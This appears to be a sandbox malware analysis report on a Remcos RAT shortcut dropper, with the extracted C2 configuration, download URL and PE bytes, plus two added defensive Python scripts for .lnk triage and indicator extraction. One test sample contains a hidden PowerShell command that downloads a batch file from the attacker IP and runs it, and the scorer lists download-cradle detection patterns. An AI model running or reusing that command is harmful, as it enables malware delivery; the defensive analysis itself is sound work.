Windows Analysis Report
Dlr7HYI6VL.lnk

Overview

General Information

Sample name: Dlr7HYI6VL.lnk
renamed because original name is a hash value
Original sample name: 383bec1808c99dcffafa9f4e03f104a4.lnk
Analysis ID: 1518489
MD5: 383bec1808c99dcffafa9f4e03f104a4
SHA1: 2f3647ea4331f7848de1c96cef6427b7136ab835
SHA256: be386e82648d80bd602030f57e67a94834f945efd92293ab660e561b22c3e850
Tags: lnk, user-abuse_ch

Detection

Remcos
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Windows shortcut file (LNK) starts blacklisted processes
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Drops PE files to the user root directory
Found direct / indirect Syscall (likely to bypass EDR)
Found hidden mapped module (file has been removed from disk)
Injects code into the Windows Explorer (explorer.exe)
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Powershell drops PE file
Sigma detected: Powerup Write Hijack DLL
Sigma detected: Suspicious Invoke-WebRequest Execution
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Switches to a custom stack to bypass stack traces
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Windows shortcut file (LNK) contains suspicious command line arguments
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates files inside the system directory
Creates job files (autostart)
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the user directory
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (may stop execution after checking a module file name)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Potential key logger detected (key state polling based)
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Invoke-WebRequest Execution With DirectIP
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Keylogger Generic
Yara signature match
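
Two of the signatures above concern the shortcut itself: it "contains suspicious command line arguments" and "starts blacklisted processes", and the Networking section records that the file embeds http://172.94.3.25/hello.bat. The parser below is an added example, not code from the Joe Sandbox report or from the sample: it reads the ShellLinkHeader and StringData of a .lnk file (the fields an attacker controls) and scores them. The .lnk bytes it analyses are constructed inside the block, because the report does not reproduce the real argument string; the relative path, the PowerShell one-liner and the regex list are assumptions for illustration.

```python
"""Shell Link (.lnk) triage: parse the header and StringData, then flag the
fields an attacker controls. Added example, not code from the report or the sample.
The .lnk built below is constructed for illustration."""
import re
import struct
import uuid

LNK_CLSID = uuid.UUID("00021401-0000-0000-c000-000000000046")
HAS_IDLIST, HAS_LINKINFO, HAS_NAME, HAS_RELPATH = 0x01, 0x02, 0x04, 0x08
HAS_WORKDIR, HAS_ARGS, HAS_ICON, IS_UNICODE = 0x10, 0x20, 0x40, 0x80
# StringData sections appear in this fixed order, each only if its flag is set.
STRINGDATA = [("name", HAS_NAME), ("relative_path", HAS_RELPATH),
              ("working_dir", HAS_WORKDIR), ("arguments", HAS_ARGS),
              ("icon_location", HAS_ICON)]
SW_SHOWMINNOACTIVE = 7  # ShowCommand value droppers use to keep the console window hidden

# Assumed heuristics (not from the report): patterns seen in LNK download cradles.
SUSPICIOUS = [
    (r"\b(powershell|pwsh|cmd|wscript|cscript|mshta|rundll32)(\.exe)?\b", "script/LOLBin host"),
    (r"https?://\d{1,3}(\.\d{1,3}){3}\b", "URL to a bare IP address"),
    (r"(invoke-webrequest|\biwr\b|downloadstring|downloadfile|\bcurl\b|\bwget\b|bitsadmin)", "download cradle"),
    (r"-(w|win|windowstyle)\s+hidden", "hidden window"),
    (r"-(e|ec|enc|encodedcommand)\b", "encoded command"),
]


def parse_lnk(data: bytes) -> dict:
    """Return ShowCommand plus whichever StringData fields the LinkFlags say are present."""
    header_size, clsid = struct.unpack_from("<I16s", data, 0)
    if header_size != 0x4C or uuid.UUID(bytes_le=clsid) != LNK_CLSID:
        raise ValueError("not a ShellLink file")
    flags = struct.unpack_from("<I", data, 0x14)[0]
    out = {"show_command": struct.unpack_from("<I", data, 0x3C)[0]}
    pos = 0x4C
    if flags & HAS_IDLIST:          # IDListSize (2 bytes) + item ID list
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINKINFO:        # LinkInfoSize counts itself
        pos += struct.unpack_from("<I", data, pos)[0]
    for key, bit in STRINGDATA:
        if not flags & bit:
            continue
        count = struct.unpack_from("<H", data, pos)[0]   # CountCharacters, no terminator
        pos += 2
        if flags & IS_UNICODE:
            out[key] = data[pos:pos + 2 * count].decode("utf-16-le")
            pos += 2 * count
        else:
            out[key] = data[pos:pos + count].decode("cp1252")
            pos += count
    return out


def triage_lnk(data: bytes) -> dict:
    """Parse, then score the path/working-dir/arguments text against SUSPICIOUS."""
    info = parse_lnk(data)
    text = " ".join(info.get(k, "") for k in ("relative_path", "working_dir", "arguments"))
    indicators = [label for pat, label in SUSPICIOUS if re.search(pat, text, re.I)]
    if info["show_command"] == SW_SHOWMINNOACTIVE:
        indicators.append("ShowCommand=SW_SHOWMINNOACTIVE (hidden window)")
    return {"fields": info,
            "urls": re.findall(r"https?://[^\s'\"]+", text),
            "indicators": indicators}


def build_lnk(relative_path: str, arguments: str, show_cmd: int = SW_SHOWMINNOACTIVE) -> bytes:
    """Constructed minimal .lnk: 76-byte header + RELATIVE_PATH + COMMAND_LINE_ARGUMENTS (Unicode)."""
    flags = HAS_RELPATH | HAS_ARGS | IS_UNICODE
    header = struct.pack("<I16sIIQQQIIIHHII", 0x4C, LNK_CLSID.bytes_le, flags,
                         0x20, 0, 0, 0, 0, 0, show_cmd, 0, 0, 0, 0)

    def string_data(s: str) -> bytes:
        return struct.pack("<H", len(s)) + s.encode("utf-16-le")

    return header + string_data(relative_path) + string_data(arguments)


# Constructed sample: the report only shows that the LNK carries http://172.94.3.25/hello.bat
# and ends up in PowerShell; this argument string is an assumption, not the sample's.
SAMPLE_LNK = build_lnk(
    r"..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
    '-w hidden -c "Invoke-WebRequest http://172.94.3.25/hello.bat -OutFile $env:TEMP\\h.bat; & $env:TEMP\\h.bat"',
)

if __name__ == "__main__":
    for k, v in triage_lnk(SAMPLE_LNK).items():
        print(f"{k}: {v}")
```

The parser deliberately stops after StringData; real droppers also pad the LinkTargetIDList and ExtraData blocks to push the arguments past what Explorer's properties dialog shows, so for a full investigation dump the raw bytes as well. A ShowCommand of 7 together with a script host in the path is a strong signal on its own, before any URL is found.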

Classification

Name: Remcos, RemcosRAT
Description: Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers. Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns. Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user. Remcos is developed by the cybersecurity company BreakingSecurity.
Attribution:
  • APT33
  • The Gorgon Group
  • UAC-0050
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

AV Detection

Source: C:\Users\user\AppData\Local\Temp\gps Avira: detection malicious, Label: BDS/Backdoor.Gen
Source: C:\Users\user\AppData\Local\Temp\demhwk Avira: detection malicious, Label: BDS/Backdoor.Gen
Source: C:\Users\user\AppData\Local\Temp\qapuwvr Avira: detection malicious, Label: BDS/Backdoor.Gen
Source: 24.2.cmd.exe.5db00c8.7.raw.unpack Malware Configuration Extractor: Remcos {"Version": "5.1.1 Pro", "Host:Port:Password": "fullimmersion777.com:8090:0", "Assigned name": "Back-September", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "hello.exe", "Startup value": "Disable", "Hide file": "Enable", "Mutex": "rimcsl-94LESJ", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
Source: C:\Users\user\AppData\Local\Temp\demhwk ReversingLabs: Detection: 86%
Source: C:\Users\user\AppData\Local\Temp\gps ReversingLabs: Detection: 86%
Source: C:\Users\user\AppData\Local\Temp\qapuwvr ReversingLabs: Detection: 86%
Source: Dlr7HYI6VL.lnk ReversingLabs: Detection: 15%
Source: Yara match File source: 24.2.cmd.exe.5db00c8.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.cmd.exe.59500c8.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 24.2.cmd.exe.5db00c8.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.2.cmd.exe.50100c8.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.cmd.exe.59500c8.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.2.cmd.exe.50100c8.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000001A.00000002.2647625743.0000000000459000.00000002.00000001.01000000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000002.2928479107.0000000000459000.00000002.00000001.01000000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000002.2929494459.0000000005010000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001E.00000002.2757772777.0000000000459000.00000002.00000001.01000000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000002.2758923017.0000000005DB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.2647715986.0000000005950000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: cmd.exe PID: 6600, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: cmd.exe PID: 2720, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: explorer.exe PID: 1460, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: cmd.exe PID: 3004, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: explorer.exe PID: 5388, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: explorer.exe PID: 4924, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\qapuwvr, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\gps, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\demhwk, type: DROPPED
Source: Submitted Sample Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\AppData\Local\Temp\gps Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\demhwk Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\qapuwvr Joe Sandbox ML: detected
Source: Dlr7HYI6VL.lnk Joe Sandbox ML: detected
Source: cmd.exe, 00000013.00000002.2647715986.0000000005950000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: -----BEGIN PUBLIC KEY----- memstr_3a1bc7b9-5
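
The Malware Configuration Extractor entry above is the most actionable line in this section: it names the C2 host and port, the mutex, and which persistence options the operator switched on. The block below is an added example, not the sandbox's own code; it parses the configuration JSON exactly as printed here and derives host and network indicators from it. Two assumptions are made and marked in the code: multi-C2 Remcos builds are treated as joining several host:port:password entries with ';', and a "Keylog flag" of 0 is read as the offline keylogger being off (the binary still carries keylogging code, as the Yara and key-state-polling signatures show).

```python
"""Derive hunting indicators from a Remcos configuration as printed by the
sandbox's Malware Configuration Extractor. Added example, not the sandbox's code."""
import json

# The configuration exactly as shown in this report (JSON with escaped backslashes).
REMCOS_CONFIG = r'''{"Version": "5.1.1 Pro", "Host:Port:Password": "fullimmersion777.com:8090:0", "Assigned name": "Back-September", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "hello.exe", "Startup value": "Disable", "Hide file": "Enable", "Mutex": "rimcsl-94LESJ", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}'''

RUN_KEY = "Software\\Microsoft\\Windows\\CurrentVersion\\Run"


def load_config(text: str) -> dict:
    """The extractor prints plain JSON; backslashes in key names are JSON-escaped."""
    return json.loads(text)


def parse_c2(field: str) -> list:
    """'host:port:password' entries. Assumption: multi-C2 builds join several with ';'."""
    entries = []
    for item in filter(None, (p.strip() for p in field.split(";"))):
        host, port, password = item.rsplit(":", 2)   # rsplit keeps any ':' inside the host
        entries.append({"host": host, "port": int(port), "password": password})
    return entries


def derive_iocs(cfg: dict) -> dict:
    """Turn option flags into the artefacts a responder should expect on disk, in the registry and on the wire."""
    c2 = parse_c2(cfg["Host:Port:Password"])
    iocs = {
        "version": cfg.get("Version"),
        "network": [f'{e["host"]}:{e["port"]}' for e in c2],
        "mutex": cfg.get("Mutex"),
        "files": [],
        "registry_run_keys": [],
        "notes": [],
    }
    if cfg.get("Install flag") == "Enable":
        iocs["files"].append(cfg.get("Copy file"))
    else:
        iocs["notes"].append("Install flag disabled: no self-copy, the RAT lives only in the injected host process")
    for hive in ("HKCU", "HKLM"):
        if cfg.get(f"Setup {hive}\\Run") == "Enable":
            iocs["registry_run_keys"].append(f"{hive}\\{RUN_KEY}")
    if any(k.startswith("HKLM") for k in iocs["registry_run_keys"]):
        iocs["notes"].append("HKLM Run persistence needs admin rights; consistent with the CMSTP UAC-bypass Yara hit")
    # Assumption: 'Keylog flag' 0 means the offline keylogger is switched off.
    if cfg.get("Keylog flag") not in (None, "0"):
        iocs["files"].append(cfg.get("Keylog file"))
    if cfg.get("Screenshot flag") == "Enable":
        iocs["files"].append(cfg.get("Screenshot file"))
    return iocs


if __name__ == "__main__":
    for key, value in derive_iocs(load_config(REMCOS_CONFIG)).items():
        print(f"{key}: {value}")
```

For this sample the derivation says: block or sinkhole fullimmersion777.com:8090, look for the mutex rimcsl-94LESJ in the injected cmd.exe and explorer.exe processes, and expect Run values in both hives rather than a dropped hello.exe, since the install flag is off. That matches the rest of the report, where persistence shows up as a Startup-folder write from the batch/VBS chain rather than as a Remcos self-copy.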

Exploits

Source: Yara match File source: 24.2.cmd.exe.5862757.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 24.2.cmd.exe.5861b57.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 26.2.explorer.exe.4e80757.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.DZIPR.exe.362a9ce.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 26.2.explorer.exe.4e7fb57.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 24.2.cmd.exe.581ca8a.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.DZIPR.exe.362b5ce.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 30.2.explorer.exe.4ee7a8a.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 24.2.cmd.exe.5db00c8.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.cmd.exe.59500c8.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 24.2.cmd.exe.5db00c8.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.cmd.exe.4f4a757.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.2.cmd.exe.50100c8.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.cmd.exe.4f04a8a.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.cmd.exe.59500c8.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.cmd.exe.4f49b57.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 30.2.explorer.exe.4f2cb57.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.2.cmd.exe.49d1a8a.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 30.2.explorer.exe.4f2d757.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 31.2.explorer.exe.4daca8a.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.2.cmd.exe.4a17757.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.2.cmd.exe.4a16b57.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.2.cmd.exe.50100c8.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 26.2.explorer.exe.4e3aa8a.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 31.2.explorer.exe.4df2757.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 31.2.explorer.exe.4df1b57.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.DZIPR.exe.35e5901.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000001A.00000002.2647625743.0000000000459000.00000002.00000001.01000000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000002.2928479107.0000000000459000.00000002.00000001.01000000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000002.2758525091.0000000005816000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000002.2929002610.0000000004DA6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000002.2929494459.0000000005010000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.2647144627.0000000004EFE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000002.2929106731.00000000049CB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001A.00000002.2648103651.0000000004E34000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.2343813669.00000000035DF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001E.00000002.2757772777.0000000000459000.00000002.00000001.01000000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000002.2758923017.0000000005DB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001E.00000002.2758378104.0000000004EE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.2647715986.0000000005950000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: DZIPR.exe PID: 5660, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: cmd.exe PID: 6600, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: cmd.exe PID: 2720, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: explorer.exe PID: 1460, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: cmd.exe PID: 3004, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: explorer.exe PID: 5388, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: explorer.exe PID: 4924, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\qapuwvr, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\gps, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\demhwk, type: DROPPED
Source: Binary string: msacm32.pdbUGP source: cmd.exe, 00000013.00000002.2647715986.0000000005950000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2758923017.0000000005DB0000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.2647742900.0000000000482000.00000008.00000001.01000000.00000000.sdmp, cmd.exe, 0000001C.00000002.2929494459.0000000005010000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2757855590.0000000000482000.00000008.00000001.01000000.00000000.sdmp, explorer.exe, 0000001F.00000002.2928565084.0000000000482000.00000008.00000001.01000000.00000000.sdmp, gps.28.dr
Source: Binary string: msacm32.pdb source: cmd.exe, 00000013.00000002.2647715986.0000000005950000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2758923017.0000000005DB0000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.2647742900.0000000000482000.00000008.00000001.01000000.00000000.sdmp, cmd.exe, 0000001C.00000002.2929494459.0000000005010000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2757855590.0000000000482000.00000008.00000001.01000000.00000000.sdmp, explorer.exe, 0000001F.00000002.2928565084.0000000000482000.00000008.00000001.01000000.00000000.sdmp, gps.28.dr
Source: Binary string: wntdll.pdbUGP source: DZIPR.exe, 00000011.00000002.2345624953.0000000003B30000.00000004.00000800.00020000.00000000.sdmp, DZIPR.exe, 00000011.00000002.2344649003.00000000037D4000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.2647242156.0000000004FF0000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.2647012116.0000000004B56000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2758662727.0000000005900000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2758330772.0000000005467000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.2647951054.0000000004A87000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.2648211502.0000000004F20000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2929229383.0000000004AC0000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2928936283.0000000004626000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2758507951.0000000004FD0000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2758130432.0000000004B11000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001F.00000002.2929126997.0000000004E90000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 0000001F.00000002.2928791787.00000000049B7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: DZIPR.exe, 00000011.00000002.2345624953.0000000003B30000.00000004.00000800.00020000.00000000.sdmp, DZIPR.exe, 00000011.00000002.2344649003.00000000037D4000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.2647242156.0000000004FF0000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.2647012116.0000000004B56000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2758662727.0000000005900000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2758330772.0000000005467000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.2647951054.0000000004A87000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.2648211502.0000000004F20000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2929229383.0000000004AC0000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2928936283.0000000004626000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2758507951.0000000004FD0000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2758130432.0000000004B11000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001F.00000002.2929126997.0000000004E90000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 0000001F.00000002.2928791787.00000000049B7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: E:\App\DZIPR\SDFRM\Release\SDFRM.pdb source: AUGUST.exe, 00000010.00000003.2318798588.000000000278D000.00000004.00000020.00020000.00000000.sdmp, DZIPR.exe, 00000011.00000002.2346571707.000000006FA68000.00000002.00000001.01000000.00000007.sdmp, DZIPR.exe, 00000012.00000002.2402308889.000000006C538000.00000002.00000001.01000000.0000000A.sdmp, DZIPR.exe, 00000017.00000002.2588762108.000000006FAE8000.00000002.00000001.01000000.0000000A.sdmp, DZIPR.dll.16.dr
Source: C:\Users\user\AppData\Roaming\AUGUST.exe Code function: 16_2_0040301A GetFileAttributesW,SetLastError,FindFirstFileW,FindClose,CompareFileTime, 16_2_0040301A
Source: C:\Users\user\AppData\Roaming\AUGUST.exe Code function: 16_2_00402B79 FindFirstFileW,SetFileAttributesW,lstrcmpW,lstrcmpW,SetFileAttributesW,DeleteFileW,FindNextFileW,FindClose,SetFileAttributesW,RemoveDirectoryW,??3@YAXPAX@Z,??3@YAXPAX@Z, 16_2_00402B79
Source: C:\Users\user\DZIPR.exe Code function: 17_2_6FA4748E __EH_prolog3_GS,GetFullPathNameW,PathIsUNCW,GetVolumeInformationW,CharUpperW,FindFirstFileW,FindClose,lstrlenW, 17_2_6FA4748E
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe Code function: 18_2_6C51748E __EH_prolog3_GS,GetFullPathNameW,PathIsUNCW,GetVolumeInformationW,CharUpperW,FindFirstFileW,FindClose,lstrlenW, 18_2_6C51748E
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe Code function: 23_2_6FAC748E __EH_prolog3_GS,GetFullPathNameW,PathIsUNCW,GetVolumeInformationW,CharUpperW,FindFirstFileW,FindClose,lstrlenW, 23_2_6FAC748E
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Roaming\
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\

Software Vulnerabilities

Source: C:\Windows\System32\wscript.exe Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Networking

Source: Malware configuration extractor URLs: fullimmersion777.com
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKContent-Length: 4809996Last-Modified: Wed, 25 Sep 2024 11:52:30 GMTContent-Type: application/x-msdownloadDate: Wed, 25 Sep 2024 16:40:27 GMTETag: "f30293f7a768b837cdb37fc8b138e7a1-1727265150-4809996"Accept-Ranges: bytesServer: WsgiDAV/4.3.3 Cheroot/10.0.1 Python/3.12.2Data Raw: 4d 5a 60 00 01 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 52 65 71 75 69 72 65 20 57 69 6e 64 6f 77 73 0d 0a 24 50 45 00 00 4c 01 04 00 7e f8 26 4c 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 08 00 00 14 01 00 00 c8 01 00 00 00 00 00 ef 1d 01 00 00 10 00 00 00 30 01 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 30 03 00 00 02 00 00 02 33 03 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 dc 50 01 00 b4 00 00 00 00 a0 01 00 04 8d 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 01 00 10 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 17 13 01 00 00 10 00 00 00 14 01 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 ea 30 00 00 00 30 01 00 00 32 00 00 00 16 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 2c 29 00 00 00 70 01 00 00 08 00 00 00 48 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 04 